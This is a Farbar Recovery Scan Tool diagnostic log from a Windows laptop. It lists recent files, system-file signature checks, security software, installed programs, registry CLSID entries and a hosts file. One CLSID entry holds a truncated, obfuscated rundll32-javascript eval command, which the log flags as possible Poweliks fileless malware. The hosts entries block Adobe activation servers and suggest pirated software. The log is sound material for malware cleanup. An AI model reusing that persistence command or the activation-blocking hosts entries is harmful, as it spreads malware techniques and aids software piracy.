2014-12-29 19:42 - 2014-02-24 10:57 - 04489216 ___SH () C:\Users\JWT\Downloads\Thumbs.db
2014-12-29 19:13 - 2014-03-04 21:10 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-12-28 22:53 - 2014-08-21 12:40 - 00000000 ____D () C:\AdwCleaner
2014-12-27 17:01 - 2014-11-22 16:56 - 00000866 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002Core.job
2014-12-27 16:52 - 2014-02-01 00:08 - 00000000 ____D () C:\Users\JWT\AppData\Roaming\vlc
2014-12-23 13:55 - 2014-01-31 23:33 - 00000000 ____D () C:\Users\JWT
2014-12-17 21:11 - 2012-07-26 01:59 - 00000000 ____D () C:\WINDOWS\CbsTemp
2014-12-15 23:12 - 2013-08-22 07:25 - 00262144 ___SH () C:\WINDOWS\system32\config\BBI
2014-12-12 21:37 - 2014-01-31 20:27 - 00000000 ____D () C:\Users\JWT\AppData\Local\Packages
2014-12-12 18:12 - 2014-08-01 01:25 - 01715224 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2014-12-12 18:12 - 2014-08-01 01:25 - 01291464 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2014-12-12 18:12 - 2014-03-03 18:24 - 02824504 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2014-12-12 18:12 - 2014-03-03 18:24 - 02210040 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2014-12-10 23:58 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\system32\sr-Latn-RS
2014-12-10 23:58 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\system32\sr-Latn-CS
2014-12-10 23:58 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\rescache
2014-12-10 23:01 - 2014-01-31 20:31 - 00002241 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-12-10 22:47 - 2014-03-04 21:16 - 00003718 _____ () C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2014-12-10 22:45 - 2013-12-03 20:06 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation
2014-12-10 13:27 - 2014-01-31 21:04 - 00000000 ____D () C:\WINDOWS\system32\MRT
2014-12-10 13:27 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\PolicyDefinitions
2014-12-10 13:25 - 2014-01-31 21:04 - 112710672 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2014-12-05 00:54 - 2014-05-28 18:53 - 00000000 ____D () C:\WINDOWS\Minidump
 
Files to move or delete:
====================
C:\ProgramData\SetStretch.exe
C:\ProgramData\SetStretch.VBS
 
 
Some content of TEMP:
====================
C:\Users\JWT\AppData\Local\Temp\Quarantine.exe
C:\Users\JWT\AppData\Local\Temp\SpotifyUninstall.exe
C:\Users\JWT\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-12-14 17:44
 
==================== End Of Log ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-12-2014
Ran by JWT at 2014-12-30 07:21:32
Running from C:\Users\JWT\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 15.0.0.293 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.4.980 - Adobe Systems Incorporated.)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.235 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Photoshop CS5 (HKLM-x32\...\{15FEDA5F-141C-4127-8D7E-B962D1742728}) (Version: 12.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CS5.5 (HKLM-x32\...\{0497EAED-70DA-4BBE-BEB3-AF77FD8788EA}) (Version: 5.5 - Adobe Systems Incorporated)
Adobe Story (HKLM-x32\...\com.adobe.AdobeStory.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.0.571 - Adobe Systems Incorporated)
Antares Autotune VST v5.09 (HKLM-x32\...\Antares Autotune VST_is1) (Version:  - )
Antares AVOX Evo VST RTAS v3.0.2 (HKLM-x32\...\Antares AVOX Evo VST RTAS_is1) (Version:  - )
Antares Harmony Engine VST RTAS v1.0 (HKLM-x32\...\Antares Harmony Engine VST RTAS_is1) (Version:  - Team AiR 2007)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ARIA Engine v1.1.0.6 (HKLM\...\ARIA Engine_is1) (Version:  - ViP Team)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.11 Beta2 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.6 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{9B6239BF-4E85-4590-8D72-51E30DB1A9AA}) (Version: 3.0.5 - ASUS)
ASUS ROG Gaming Mouse (HKLM-x32\...\{3B9E171F-A955-4834-B877-447C0A437260}) (Version: 2.00.025 - ASUS)
ASUS Screen Saver (HKLM\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.1 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0018 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 2.1.5 - ASUS)
ASUS WebStorage Sync Agent (HKLM-x32\...\ASUS WebStorage) (Version: 1.1.18.159 - ASUS Cloud Corporation)
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5230.52 - CyberLink Corp.)
ASUSDVD (x32 Version: 10.0.5230.52 - CyberLink Corp.) Hidden
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.310 - ASUSTEK)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0030 - ASUS)
Avid Effects (HKLM-x32\...\{A86F1158-A7F7-4E8C-98E3-88F4996E85EB}) (Version: 10.3.2 - Avid Technology, Inc.)
Avid Mbox 2 USB Drivers (x64) (HKLM\...\{F9242D4E-09E7-45C7-A53A-83375D0FAD42}) (Version: 9.0.2 - Avid Technology, Inc.)
Avid Pro Tools (HKLM-x32\...\{8E60BB71-7EF3-42ED-9F10-AA041F25841A}) (Version: 10.3.2 - Avid Technology, Inc.)
BitTorrent (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\BitTorrent) (Version: 7.8.2.30489 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.01 - Piriform)
ChromecastApp (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1383.0 - Google Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ETDWare PS/2-X64 11.5.9.1_WHQL (HKLM\...\Elantech) (Version: 11.5.9.1 - ELAN Microelectronic Corp.)
Firebird v2.1 (HKLM-x32\...\Tone2 Firebird_is1) (Version:  - Tone2)
FL Studio 11 (HKLM-x32\...\FL Studio 11) (Version:  - Image-Line)
FlowStone FL 3.0 (HKLM-x32\...\FlowStone) (Version:  - )
Galería de fotos (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Genesys USB Mass Storage Device (HKLM-x32\...\{959B7F35-2819-40C5-A0CD-3C53B5FCC935}) (Version: 4.3.0.3 - Genesys Logic)
Gladiator v1.2.2 (HKLM-x32\...\Tone2 Gladiator full_is1) (Version:  - Tone2)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.221 - SurfRight B.V.)
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version:  - Image-Line)
IL MiniHost (HKLM-x32\...\IL MiniHost) (Version:  - Image-Line)
IL Ogun (HKLM-x32\...\IL Ogun) (Version:  - Image-Line)
IL Shared Libraries (HKLM-x32\...\IL Shared Libraries) (Version:  - Image-Line)
IL Slicex (HKLM-x32\...\IL Slicex) (Version:  - Image-Line)
IL Vocodex (HKLM-x32\...\IL Vocodex) (Version:  - Image-Line)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.0.10.1372 - Intel Corporation)
Interlok driver setup x64 (HKLM\...\{25613C10-27D2-410B-942B-D922D5C3A7BE}) (Version: 5.9.0 - PACE Anti-Piracy, Inc.)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
License Support (HKLM-x32\...\InstallShield_{3165EA9B-36CC-499B-96FF-36FC30E10EF4}) (Version: 1.2.0.5555 - PACE Anti-Piracy, Inc.)
License Support (Version: 1.2.0.5555 - PACE Anti-Piracy, Inc.) Hidden
Luxonix Purity VSTi v1.1.2 (HKLM-x32\...\Luxonix Purity VSTi_is1) (Version:  - )
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Maximus (HKLM-x32\...\Maximus) (Version:  - Image-Line)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4454.1510 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\OneDriveSetup.exe) (Version: 17.3.1229.0918 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Mixed in Key (x32 Version: 1.0.1228.0 - Mixed In Key LLC) Hidden
Mixed In Key 6 (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\{c4a8c8d8-fa62-4414-8a8b-3221bea4c6ef}) (Version: 6.0.1228.0 - Mixed In Key LLC)
Morphine (HKLM-x32\...\Morphine) (Version:  - Image-Line bvba)
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 33.1.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.1.1 (x86 en-US)) (Version: 33.1.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MyBitCast 2.0 (HKLM-x32\...\MyBitCast) (Version: 2.0 - ASUS)
Native Instruments Abbey Road 60s Drummer (HKLM-x32\...\Native Instruments Abbey Road 60s Drummer) (Version:  - Native Instruments)
Native Instruments Absynth 5 (HKLM-x32\...\Native Instruments Absynth 5) (Version:  - Native Instruments)
Native Instruments Battery 4 (HKLM-x32\...\Native Instruments Battery 4) (Version: 4.1.2.2354 - Native Instruments)
Native Instruments Battery 4 Factory Library (HKLM-x32\...\Native Instruments Battery 4 Factory Library) (Version: 1.0.0.002 - Native Instruments)
Native Instruments Berlin Concert Grand (HKLM-x32\...\Native Instruments Berlin Concert Grand) (Version:  - Native Instruments)
Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version:  - Native Instruments)
Native Instruments FM8 (HKLM-x32\...\Native Instruments FM8) (Version: 1.3.0.1244 - Native Instruments)
Native Instruments Guitar Rig 5 (HKLM-x32\...\Native Instruments Guitar Rig 5) (Version: 5.2.0.2770 - Native Instruments)
Native Instruments Guitar Rig Mobile IO Driver (HKLM-x32\...\Native Instruments Guitar Rig Mobile IO Driver) (Version:  - Native Instruments)
Native Instruments Guitar Rig Pro Library for Maschine (HKLM-x32\...\Native Instruments Guitar Rig Pro Library for Maschine) (Version:  - Native Instruments)
Native Instruments Guitar Rig Session IO Driver (HKLM-x32\...\Native Instruments Guitar Rig Session IO Driver) (Version:  - Native Instruments)
Native Instruments Komplete 9 (HKLM-x32\...\Native Instruments Komplete 9) (Version:  - Native Instruments)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.3.0.6464 - Native Instruments)
Native Instruments Kontakt Factory Library (HKLM-x32\...\Native Instruments Kontakt Factory Library) (Version: 1.1.0.6 - Native Instruments)
Native Instruments Massive (HKLM-x32\...\Native Instruments Massive) (Version: 1.4.0.292 - Native Instruments)
Native Instruments Monark (HKLM-x32\...\Native Instruments Monark) (Version: 1.1.0.2 - Native Instruments)
Native Instruments New York Concert Grand (HKLM-x32\...\Native Instruments New York Concert Grand) (Version:  - Native Instruments)
Native Instruments Rammfire (HKLM-x32\...\Native Instruments Rammfire) (Version: 2.0.0.4 - Native Instruments)
Native Instruments Rammfire for Maschine (HKLM-x32\...\Native Instruments Rammfire for Maschine) (Version:  - Native Instruments)
Native Instruments Reaktor 5 (HKLM-x32\...\Native Instruments Reaktor 5) (Version:  - Native Instruments)
Native Instruments Reaktor Prism (HKLM-x32\...\Native Instruments Reaktor Prism) (Version:  - Native Instruments)
Native Instruments Reaktor Spark R2 (HKLM-x32\...\Native Instruments Reaktor Spark R2) (Version:  - Native Instruments)
Native Instruments Reflektor (HKLM-x32\...\Native Instruments Reflektor) (Version:  - Native Instruments)
Native Instruments Reflektor for Maschine (HKLM-x32\...\Native Instruments Reflektor for Maschine) (Version:  - Native Instruments)
Native Instruments Retro Machines Mk2 (HKLM-x32\...\Native Instruments Retro Machines Mk2) (Version:  - Native Instruments)
Native Instruments Rig Kontrol 3 Driver (HKLM-x32\...\Native Instruments Rig Kontrol 3 Driver) (Version:  - Native Instruments)
Native Instruments Scarbee MM-Bass (HKLM-x32\...\Native Instruments Scarbee MM-Bass) (Version:  - Native Instruments)
Native Instruments Scarbee Vintage Keys (HKLM-x32\...\Native Instruments Scarbee Vintage Keys) (Version:  - Native Instruments)
Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.4.0.1093 - Native Instruments)
Native Instruments Session Strings (HKLM-x32\...\Native Instruments Session Strings) (Version:  - Native Instruments)
Native Instruments Solid Bus Comp FX (HKLM-x32\...\Native Instruments Solid Bus Comp FX) (Version: 1.0.0.276 - Native Instruments)
Native Instruments Solid Dynamics FX (HKLM-x32\...\Native Instruments Solid Dynamics FX) (Version: 1.1.1.427 - Native Instruments)
Native Instruments Solid EQ FX (HKLM-x32\...\Native Instruments Solid EQ FX) (Version: 1.1.1.427 - Native Instruments)
Native Instruments Studio Drummer (HKLM-x32\...\Native Instruments Studio Drummer) (Version:  - Native Instruments)
Native Instruments The Finger R2 (HKLM-x32\...\Native Instruments The Finger R2) (Version: 1.3.0.2 - Native Instruments)
Native Instruments The Giant (HKLM-x32\...\Native Instruments The Giant) (Version:  - Native Instruments)
Native Instruments Traktors 12 (HKLM-x32\...\Native Instruments Traktors 12) (Version:  - Native Instruments)
Native Instruments Traktors 12 for Maschine (HKLM-x32\...\Native Instruments Traktors 12 for Maschine) (Version:  - Native Instruments)
Native Instruments Transient Master FX (HKLM-x32\...\Native Instruments Transient Master FX) (Version:  - Native Instruments)
Native Instruments Upright Piano (HKLM-x32\...\Native Instruments Upright Piano) (Version:  - Native Instruments)
Native Instruments Vienna Concert Grand (HKLM-x32\...\Native Instruments Vienna Concert Grand) (Version:  - Native Instruments)
Native Instruments Vintage Organs (HKLM-x32\...\Native Instruments Vintage Organs) (Version:  - Native Instruments)
Native Instruments West Africa (HKLM-x32\...\Native Instruments West Africa) (Version:  - Native Instruments)
NVIDIA 3D Vision Driver 344.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 344.65 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.1.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.5 - NVIDIA Corporation)
NVIDIA Graphics Driver 344.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 344.65 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation)
Octoshape Streaming Services (HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\Octoshape Streaming Services) (Version:  - Octoshape ApS)
PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Plogue chipsounds VSTi RTAS Standalone v1.5 (HKLM\...\Plogue chipsounds_is1) (Version:  - ViP Team)
PoiZone (HKLM-x32\...\PoiZone) (Version:  - Image-Line)
PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
Qualcomm Atheros Bandwidth Control Filter Driver (Version: 1.0.33.1267 - Qualcomm Atheros) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.316 - Qualcomm Atheros Communications)
Qualcomm Atheros Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.1.0.17 - Qualcomm Atheros Inc.)
Qualcomm Atheros Killer Wireless-N Drivers (Version: 1.0.33.1267 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer Wireless-N Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.0.33.1267 - Qualcomm Atheros)
Qualcomm Atheros Network Manager (Version: 1.0.33.1267 - Qualcomm Atheros) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7023 - Realtek Semiconductor Corp.)
reFX Vanguard VSTi v1.6.1 (HKLM-x32\...\reFX Vanguard VSTi_is1) (Version:  - )
Sakura (HKLM-x32\...\Sakura) (Version:  - Image-Line)
Sawer (HKLM-x32\...\Sawer) (Version:  - Image-Line)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SHIELD Streaming (Version: 3.1.3000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 16.18.9 - NVIDIA Corporation) Hidden
SimSynth (HKLM-x32\...\SimSynth) (Version:  - Image-Line)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.7.1018 - SUPERAntiSpyware.com)
Sytrus (HKLM-x32\...\Sytrus) (Version:  - Image-Line)
Toxic Biohazard (HKLM-x32\...\Toxic Biohazard) (Version:  - Image-Line bvba)
Visual C++ 64-bit Redistributables (HKLM-x32\...\InstallShield_{FB03650C-B373-4B20-ACA5-B7BA1A8EEE33}) (Version: 1.2.0.5555 - PACE Anti-Piracy, Inc.)
Visual C++ Redistributables (HKLM-x32\...\InstallShield_{F03117FA-9270-46B0-9666-0B4BC2CDEBF5}) (Version: 1.2.0.5555 - PACE Anti-Piracy, Inc.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Waves Complete V9r1 (HKLM-x32\...\{90000001-C561-4E32-99EB-3C5AD3683A70}) (Version: 9.0.1 - Waves)
Widevine Media Optimizer Chrome 6.0.0 (HKLM-x32\...\optimizer_chrome) (Version: 6.0.0.12442 - Widevine Technologies)
Widevine Media Optimizer Chrome 6.0.0 (HKU\.DEFAULT\...\optimizer_chrome) (Version: 6.0.0.12757 - Widevine Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
影像中心 (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
照片库 (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\JWT\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\JWT\AppData\Local\DIRECTV Player\win64\npPlayerPlugin64.dll No File
CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\JWT\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3865632982-2122395147-3624827403-1002_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\JWT\AppData\Local\Microsoft\SkyDrive\17.3.1229.0918\amd64\FileSyncApi64.dll (Microsoft Corporation)
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-05-21 10:26 - 2014-09-28 14:10 - 00002708 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 3dns.adobe.com 3dns-1.adobe.com 3dns-2.adobe.com 3dns-3.adobe.com 3dns-4.adobe.com activate.adobe.com activate-sea.adobe.com activate-sjc0.adobe.com activate.wip.adobe.com
127.0.0.1 activate.wip1.adobe.com activate.wip2.adobe.com activate.wip3.adobe.com activate.wip4.adobe.com adobe-dns.adobe.com adobe-dns-1.adobe.com adobe-dns-2.adobe.com adobe-dns-3.adobe.com adobe-dns-4.adobe.com
127.0.0.1 adobeereg.com practivate.adobe practivate.adobe.com practivate.adobe.newoa practivate.adobe.ntp practivate.adobe.ipp ereg.adobe.com ereg.wip.adobe.com ereg.wip1.adobe.com
127.0.0.1 ereg.wip2.adobe.com ereg.wip3.adobe.com ereg.wip4.adobe.com hl2rcv.adobe.com wip.adobe.com wip1.adobe.com wip2.adobe.com wip3.adobe.com wip4.adobe.com
127.0.0.1 www.adobeereg.com wwis-dubc1-vip60.adobe.com www.wip.adobe.com www.wip1.adobe.com
127.0.0.1 www.wip2.adobe.com www.wip3.adobe.com www.wip4.adobe.com wwis-dubc1-vip60.adobe.com crl.verisign.net CRL.VERISIGN.NET ood.opsource.net
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
 
There are 2 more lines.
 
 
==================== Scheduled Tasks (whitelisted) =============
 
